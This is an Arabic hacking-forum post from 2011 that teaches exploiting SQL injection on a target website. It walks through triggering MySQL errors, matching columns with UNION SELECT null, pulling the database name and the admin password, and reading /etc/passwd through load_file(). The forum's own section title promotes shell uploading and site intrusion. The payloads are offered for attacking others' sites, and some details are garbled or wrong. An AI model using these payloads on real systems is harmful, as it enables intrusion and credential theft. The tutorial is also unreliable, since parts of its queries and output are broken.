بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile
بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile
بدايه تعلم الهكر من الصفر الى الاحتراف
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


تعليم اصول الهكر
 
الرئيسيةالبوابةالمنشوراتأحدث الصورالتسجيلدخول

بدايه تعلم الهكر من الصفر الى الاحتراف :: دروس لرفع الشلات اختراق المواقع الاجهزه دورات مجانيه شرحphp شرح Perl
 

 اساسيات SQL-injection

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin

اساسيات SQL-injection Www_md10
Admin


عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
المزاج المزاج : Don't Play With Me

اساسيات SQL-injection Empty
مُساهمةموضوع: اساسيات SQL-injection   اساسيات SQL-injection Icon_minitimeالثلاثاء أغسطس 09, 2011 5:57 pm




اما بعد فهذا درس لشرح ثغرة


SQL-injection و كيفية استغلالها
نيدا
تعريف SQL-injection :
هي التقنيه المستخدمة للاستفادة من الضعف الصادر عن اوامر الكترونية عبر
شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا نحن نحصل علي
الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السرية الخاصة
بالموقع

نبدا شرح استغل SQL-injection عن طريق الخطأ
mysql_fecth_array()
مثل الموقع المستهدف


طبعا لاكتشاف الخطأ نحاول ندخل رمز غير معروف في القاعدة لحدوث الخطأ مثل

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]'

طبعا القاعد لم تستطيع التعرف علي الرمز 1'
يظهر أن الأمر خطا
يكون

Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line

خطا قواعد البيانات في الدالة
Warning: mysql_fecth_array():

هنا يمكن الاستغلال مباشر لل SQL-injection
و في نفس الوقت ظهر لينا مكان الموقع علي السير فر
home/site/index.php

نبدا في تطبيق SQL-injection

UNION SELECT null
UNION :و الأمر هذا يستخدم لإضافة استعلام آخر تابع للاستعلام المصاب بالثغرة
SELECT :و هذا الأمر عن طريقه يتم استخراج البيانات
Null :و هذا الأمر لضبط عدد columns مع القاعدة
المهم بعد هذا نجرب نبدا ب nullواحده

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null
للأسف لم تربط بالقاعدة نجرب 2 null

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null,null
هكذا ربط بالقاعده طيب الآن حابين نعرف Table في القاعدة
باستخدام الأمر DATABASE() ونضيف الدالة هادي في آخر null
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null,DATABASE()/
ويكون الناتج
CODEUSER()
PASSWORD()
VERSION

طبعا الجداول هادي ايوزر تاع اسم المستخدم و الباسورد تاع باسورد الادمن
ويكون الاستعلام لاستخراج الباسورد
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null,password
و أمر استخراج اليوزر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null,password WHERE user='admin' /*

الان تقول طيب SQL-injection فاشلة باش تجيب الباسورد MD5
بصح رايح يوريلك أمر يعتبر فيل انكلود وهو باستخدام الأمر load_file()
ويكون الاستعلام فيه
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SELECT null,load_file('/etc/passwd')

و الامر هذا يعرض ليك PAsswd يعني يتم استغلال فيل انكلود و أنت تعرف خطورة الدالة file_load

الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://mr11-11mr.7olm.org
 
اساسيات SQL-injection
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» رفع شل عن طريق ثغرات SQL Injection
» أسلوب Blind SQL injection
» أسلوب Blind SQL injection الدرس الثاني
» ثغرة Sql Injection ملايييين المواقع مصاابه مع شرح كيفيه الاستغلال

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بدايه تعلم الهكر من الصفر الى الاحتراف :: دروس لرفع الشلات اختراق المواقع الاجهزه دورات مجانيه شرحphp شرح Perl-
انتقل الى: